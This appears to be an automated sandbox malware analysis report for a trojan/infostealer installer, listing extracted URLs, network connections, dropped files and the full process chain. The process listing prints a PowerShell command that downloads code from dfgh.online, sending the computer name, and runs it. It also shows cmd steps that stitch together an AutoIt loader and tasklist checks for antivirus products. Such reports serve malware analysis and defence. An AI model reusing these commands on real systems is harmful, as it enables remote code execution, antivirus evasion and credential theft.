        Source: M.com, 0000000D.00000003.2442381109.00000000045D0000.00000004.00000800.00020000.00000000.sdmp, M.com, 0000000D.00000003.2442531809.0000000004744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: powershell.exe, 00000011.00000002.2556892585.00000000055F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000011.00000002.2556892585.00000000055F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000011.00000002.2556892585.00000000055F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: powershell.exe, 00000011.00000002.2554947823.00000000046E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online
        Source: powershell.exe, 00000011.00000002.2554947823.0000000004591000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compName=
        Source: powershell.exe, 00000011.00000002.2554947823.00000000046E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compName=user-PC
        Source: powershell.exe, 00000011.00000002.2554408777.00000000028E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compname=
        Source: M.com, 0000000D.00000003.2442381109.00000000045D0000.00000004.00000800.00020000.00000000.sdmp, M.com, 0000000D.00000003.2442531809.0000000004744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: M.com, 0000000D.00000003.2442381109.00000000045D0000.00000004.00000800.00020000.00000000.sdmp, M.com, 0000000D.00000003.2442531809.0000000004744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: M.com, 0000000D.00000003.2442381109.00000000045D0000.00000004.00000800.00020000.00000000.sdmp, M.com, 0000000D.00000003.2442531809.0000000004744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: powershell.exe, 00000011.00000002.2554947823.00000000046E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000011.00000002.2554947823.0000000004D95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
        Source: T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2641722859.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2634835497.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000016.00000003.3134751651.00000000025F0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drString found in binary or memory: https://jrsoftware.org/
        Source: T0VC3MU5SNNFXQB43V5.exe, 00000013.00000000.2614777068.0000000000341000.00000020.00000001.01000000.0000000A.sdmp, T0VC3MU5SNNFXQB43V5.exe.13.drString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
        Source: T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2641722859.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2634835497.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000016.00000003.3134751651.00000000025F0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drString found in binary or memory: https://jrsoftware.org0
        Source: powershell.exe, 00000011.00000002.2556892585.00000000055F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
        Source: T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2641722859.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000016.00000003.3134751651.00000000025F0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
        Source: T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2641722859.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2634835497.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000016.00000003.3134751651.00000000025F0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drString found in binary or memory: https://sectigo.com/CPS0D
        Source: T0VC3MU5SNNFXQB43V5.exe.13.drString found in binary or memory: https://ssl.trustwave.com/CA03
        Source: M.com, 0000000D.00000003.2464957787.0000000005AE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
        Source: M.com, 0000000D.00000003.2464957787.0000000005AE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
        Source: M.com, 0000000D.00000003.2420067526.0000000004C54000.00000004.00000800.00020000.00000000.sdmp, M.com.2.dr, Enable.9.drString found in binary or memory: https://www.autoitscript.com/autoit3/
        Source: T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2641722859.0000000002CB0000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000003.2634835497.0000000003D80000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000016.00000003.3134751651.00000000025F0000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.20.drString found in binary or memory: https://www.certum.pl/CPS0
        Source: M.com, 0000000D.00000003.2442381109.00000000045D0000.00000004.00000800.00020000.00000000.sdmp, M.com, 0000000D.00000003.2442531809.0000000004744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
        Source: Enable.9.drString found in binary or memory: https://www.globalsign.com/repository/0
        Source: M.com, 0000000D.00000003.2442381109.00000000045D0000.00000004.00000800.00020000.00000000.sdmp, M.com, 0000000D.00000003.2442531809.0000000004744000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
        Source: T0VC3MU5SNNFXQB43V5.exe, 00000013.00000003.2626183069.0000000002ACF000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.exe, 00000013.00000003.2629537695.000000007F89B000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000000.2632251744.0000000000191000.00000020.00000001.01000000.0000000B.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000016.00000000.2654428683.0000000000CDD000.00000020.00000001.01000000.0000000D.sdmpString found in binary or memory: https://www.innosetup.com/
        Source: M.com, 0000000D.00000003.2464957787.0000000005AE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
        Source: M.com, 0000000D.00000003.2464957787.0000000005AE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
        Source: M.com, 0000000D.00000003.2464957787.0000000005AE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
        Source: M.com, 0000000D.00000003.2464957787.0000000005AE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
        Source: M.com, 0000000D.00000003.2464957787.0000000005AE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
        Source: M.com, 0000000D.00000003.2464957787.0000000005AE9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
        Source: T0VC3MU5SNNFXQB43V5.exe, 00000013.00000003.2626183069.0000000002ACF000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.exe, 00000013.00000003.2629537695.000000007F89B000.00000004.00001000.00020000.00000000.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000014.00000000.2632251744.0000000000191000.00000020.00000001.01000000.0000000B.sdmp, T0VC3MU5SNNFXQB43V5.tmp, 00000016.00000000.2654428683.0000000000CDD000.00000020.00000001.01000000.0000000D.sdmpString found in binary or memory: https://www.remobjects.com/ps
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
        Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
        Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
        Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
        Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
        Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
        Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
        Source: unknownHTTPS traffic detected: 104.21.44.159:443 -> 192.168.2.5:49842 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.44.159:443 -> 192.168.2.5:49846 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.44.159:443 -> 192.168.2.5:49853 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.44.159:443 -> 192.168.2.5:49860 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.44.159:443 -> 192.168.2.5:49867 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.44.159:443 -> 192.168.2.5:49877 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.44.159:443 -> 192.168.2.5:49888 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.44.159:443 -> 192.168.2.5:49897 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.44.159:443 -> 192.168.2.5:49910 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.5:49920 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 172.67.208.58:443 -> 192.168.2.5:49927 version: TLS 1.2
        Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050CD
        Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5

        System Summary

        barindex
        Sample or dropped binary is a compiled AutoHotkey binary
        Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeWindow found: window name: AutoHotkey
        Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,CoUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,0_2_00403883
        Source: C:\Users\user\Desktop\Setup.exeFile created: C:\Windows\LimitationReidJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeFile created: C:\Windows\WhyBedroomJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeFile created: C:\Windows\UpdatesLikedJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeFile created: C:\Windows\AnalysesDoctorsJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeFile created: C:\Windows\BeginnersPhotographJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeFile created: C:\Windows\AffiliatesTipJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeFile created: C:\Windows\RapidlyFinlandJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeFile created: C:\Windows\DeutschMarcJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeFile created: C:\Windows\MemorabiliaEnvironmentalJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_0040497C0_2_0040497C
        Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_00406ED20_2_00406ED2
        Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_004074BB0_2_004074BB
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
        Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe 16E037D7B5F6A8E02B73671E1214B7979EB5D0AB0FC1106CF4C321F0FF53E13A
        Source: C:\Users\user\Desktop\Setup.exeCode function: String function: 004062A3 appears 58 times
        Source: Setup.exeStatic PE information: invalid certificate
        Source: T0VC3MU5SNNFXQB43V5.tmp.19.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
        Source: T0VC3MU5SNNFXQB43V5.tmp.21.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
        Source: T0VC3MU5SNNFXQB43V5.exe.13.drStatic PE information: Number of sections : 11 > 10
        Source: T0VC3MU5SNNFXQB43V5.tmp.21.drStatic PE information: Number of sections : 11 > 10
        Source: T0VC3MU5SNNFXQB43V5.tmp.19.drStatic PE information: Number of sections : 11 > 10
        Source: Setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@84/35@5/3
        Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
        Source: C:\Users\user\Desktop\Setup.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
        Source: C:\Users\user\Desktop\Setup.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\UndJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:428:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3692:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2748:120:WilError_03
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5336:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5432:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3688:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1708:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3552:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1372:120:WilError_03
        Source: C:\Users\user\Desktop\Setup.exeFile created: C:\Users\user\AppData\Local\Temp\nsv117.tmpJump to behavior
        Source: Setup.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
        Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
        Source: C:\Windows\SysWOW64\findstr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SOPHOSHEALTH.EXE'
        Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'WRSA.EXE'
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'OPSSVC.EXE'
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVASTUI.EXE'
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVGUI.EXE'
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'NSWSCSVC.EXE'
        Source: C:\Windows\System32\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SOPHOSHEALTH.EXE'
        Source: C:\Users\user\Desktop\Setup.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\Setup.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
        Source: tasklist.exe, 0000002B.00000002.3034028705.000002EC9257D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'NSWSCSVC.EXE'S;.VBE;.JS55_6
        Source: tasklist.exe, 0000002B.00000003.3033282077.000002EC9257D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'NSWSCSVC.EXE'S;.VBE;.JS
        Source: M.com, 0000000D.00000003.2443122804.00000000044A1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: Setup.exeVirustotal: Detection: 8%
        Source: C:\Users\user\Desktop\Setup.exeFile read: C:\Users\user\Desktop\Setup.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\Setup.exe "C:\Users\user\Desktop\Setup.exe"
        Source: C:\Users\user\Desktop\Setup.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Archive Archive.cmd & Archive.cmd
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 811185
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Thousand
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "makes" Makes
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 811185\M.com + Symbol + Bang + Sons + Prefix + Re + Answers + Frank + Chancellor + Enable 811185\M.com
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Gather + ..\Intend + ..\Couple + ..\Und + ..\Desktop + ..\Laboratories + ..\Leonard c
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.com M.com c
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\811185\M.comProcess created: C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe "C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe"
        Source: C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exeProcess created: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmp "C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmp" /SL5="$60296,7785838,845824,C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe"
        Source: C:\Users\user\AppData\Local\Temp\is-L9TD5.tmp\T0VC3MU5SNNFXQB43V5.tmpProcess created: C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe "C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe" /VERYSILENT
        Source: C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exeProcess created: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmp "C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmp" /SL5="$70296,7785838,845824,C:\Users\user\AppData\Local\Temp\T0VC3MU5SNNFXQB43V5.exe" /VERYSILENT
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpProcess created: C:\Windows\System32\timeout.exe "timeout" 9
        Source: C:\Windows\System32\timeout.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"
        Source: C:\Users\user\AppData\Local\Temp\is-40G02.tmp\T0VC3MU5SNNFXQB43V5.tmpProcess created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"
